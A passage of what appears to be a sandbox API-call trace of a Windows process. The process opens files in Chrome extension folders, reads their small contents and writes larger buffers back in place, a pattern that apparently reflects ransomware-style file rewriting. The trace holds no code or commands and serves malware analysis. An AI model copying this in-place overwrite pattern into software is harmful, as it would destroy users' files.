lpBuffer=0x1f37818, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f37818*, lpNumberOfBytesRead=0x359f2bc*=0xb3, lpOverlapped=0x0) returned 1 [0161.275] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0161.275] WriteFile (in: hFile=0x210, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x63b, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x359f2d0*=0x63b, lpOverlapped=0x0) returned 1 [0161.276] CloseHandle (hObject=0x210) returned 1 [0161.276] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0161.277] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.277] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xb3 [0161.277] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.277] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.277] ReleaseMutex (hMutex=0x168) returned 1 [0161.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0161.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0161.278] ReadFile (in: hFile=0x210, lpBuffer=0x1f37818, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f37818*, lpNumberOfBytesRead=0x359f2bc*=0xb3, lpOverlapped=0x0) returned 1 [0161.279] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0161.279] WriteFile (in: hFile=0x210, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x63b, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x359f2d0*=0x63b, lpOverlapped=0x0) returned 1 [0161.279] CloseHandle (hObject=0x210) returned 1 [0161.279] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0161.280] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.280] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xb3 [0161.280] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.280] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.280] ReleaseMutex (hMutex=0x168) returned 1 [0161.280] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0161.280] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0161.280] ReadFile (in: hFile=0x210, lpBuffer=0x1f37818, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f37818*, lpNumberOfBytesRead=0x359f2bc*=0xb3, lpOverlapped=0x0) returned 1 [0161.282] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0161.282] WriteFile (in: hFile=0x210, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x63b, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x359f2d0*=0x63b, lpOverlapped=0x0) returned 1 [0161.282] CloseHandle (hObject=0x210) returned 1 [0161.282] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0161.283] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.283] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x5f [0161.283] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.284] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.284] ReleaseMutex (hMutex=0x168) returned 1 [0161.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="main.js", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0161.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="main.js", cchWideChar=7, lpMultiByteStr=0x1f7ad44, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="main.js", lpUsedDefaultChar=0x0) returned 7 [0161.284] ReadFile (in: hFile=0x210, lpBuffer=0x1f56af8, nNumberOfBytesToRead=0x5f, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f56af8*, lpNumberOfBytesRead=0x359f2bc*=0x5f, lpOverlapped=0x0) returned 1 [0161.285] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0161.285] WriteFile (in: hFile=0x210, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x5e7, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x359f2d0*=0x5e7, lpOverlapped=0x0) returned 1 [0161.286] CloseHandle (hObject=0x210) returned 1 [0161.514] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0161.515] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.515] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x130 [0161.515] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.515] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.515] ReleaseMutex (hMutex=0x168) returned 1 [0161.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0161.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0161.516] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f1dbe8, nNumberOfBytesToRead=0x130, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f1dbe8*, lpNumberOfBytesRead=0x359f2bc*=0x130, lpOverlapped=0x0) returned 1 [0161.517] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0161.517] WriteFile (in: hFile=0x1d8, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x6b8, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x359f2d0*=0x6b8, lpOverlapped=0x0) returned 1 [0161.517] CloseHandle (hObject=0x1d8) returned 1 [0161.517] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0161.527] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.527] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xe2 [0161.528] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.528] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.528] ReleaseMutex (hMutex=0x168) returned 1 [0161.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0161.528] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0161.528] ReadFile (in: hFile=0x1d8, lpBuffer=0x26c4e68, nNumberOfBytesToRead=0xe2, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4e68*, lpNumberOfBytesRead=0x359f2bc*=0xe2, lpOverlapped=0x0) returned 1 [0161.529] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0161.529] WriteFile (in: hFile=0x1d8, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x66a, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x359f2d0*=0x66a, lpOverlapped=0x0) returned 1 [0161.530] CloseHandle (hObject=0x1d8) returned 1 [0161.530] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0161.531] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.531] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xeb [0161.531] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.531] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.531] ReleaseMutex (hMutex=0x168) returned 1 [0161.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0161.532] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7346c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0161.532] ReadFile (in: hFile=0x1d8, lpBuffer=0x2697308, nNumberOfBytesToRead=0xeb, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2697308*, lpNumberOfBytesRead=0x359f2bc*=0xeb, lpOverlapped=0x0) returned 1 [0161.533] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0161.533] WriteFile (in: hFile=0x1d8, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x673, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x359f2d0*=0x673, lpOverlapped=0x0) returned 1 [0161.533] CloseHandle (hObject=0x1d8) returned 1 [0161.534] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0161.534] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.535] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xe2 [0161.535] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.535] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.535] ReleaseMutex (hMutex=0x168) returned 1 [0161.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0161.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0161.535] ReadFile (in: hFile=0x1d8, lpBuffer=0x26c4e68, nNumberOfBytesToRead=0xe2, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4e68*, lpNumberOfBytesRead=0x359f2bc*=0xe2, lpOverlapped=0x0) returned 1 [0161.537] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0161.537] WriteFile (in: hFile=0x1d8, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x66a, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x359f2d0*=0x66a, lpOverlapped=0x0) returned 1 [0161.537] CloseHandle (hObject=0x1d8) returned 1 [0161.538] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0161.538] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.538] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xfe [0161.539] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.539] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.539] ReleaseMutex (hMutex=0x168) returned 1 [0161.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0161.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7346c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0161.539] ReadFile (in: hFile=0x1d8, lpBuffer=0x1eeb308, nNumberOfBytesToRead=0xfe, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eeb308*, lpNumberOfBytesRead=0x359f2bc*=0xfe, lpOverlapped=0x0) returned 1 [0161.540] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0161.540] WriteFile (in: hFile=0x1d8, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x686, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x359f2d0*=0x686, lpOverlapped=0x0) returned 1 [0161.541] CloseHandle (hObject=0x1d8) returned 1 [0161.541] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dashersettingschema.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0161.542] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.542] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x356 [0161.542] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.543] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.543] ReleaseMutex (hMutex=0x168) returned 1 [0161.543] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dasherSettingSchema.json", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0161.543] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dasherSettingSchema.json", cchWideChar=24, lpMultiByteStr=0x1f8fedc, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dasherSettingSchema.json", lpUsedDefaultChar=0x0) returned 24 [0161.543] ReadFile (in: hFile=0x1d8, lpBuffer=0x284f988, nNumberOfBytesToRead=0x356, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x284f988*, lpNumberOfBytesRead=0x359f2bc*=0x356, lpOverlapped=0x0) returned 1 [0161.884] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0161.884] WriteFile (in: hFile=0x1d8, lpBuffer=0x27fc5f8*, nNumberOfBytesToWrite=0x8de, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x27fc5f8*, lpNumberOfBytesWritten=0x359f2d0*=0x8de, lpOverlapped=0x0) returned 1 [0161.884] CloseHandle (hObject=0x1d8) returned 1 [0161.885] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0161.886] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.886] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x114 [0161.886] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.886] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.887] ReleaseMutex (hMutex=0x168) returned 1 [0161.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0161.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0161.887] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ef2258, nNumberOfBytesToRead=0x114, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2258*, lpNumberOfBytesRead=0x359f2bc*=0x114, lpOverlapped=0x0) returned 1 [0161.888] 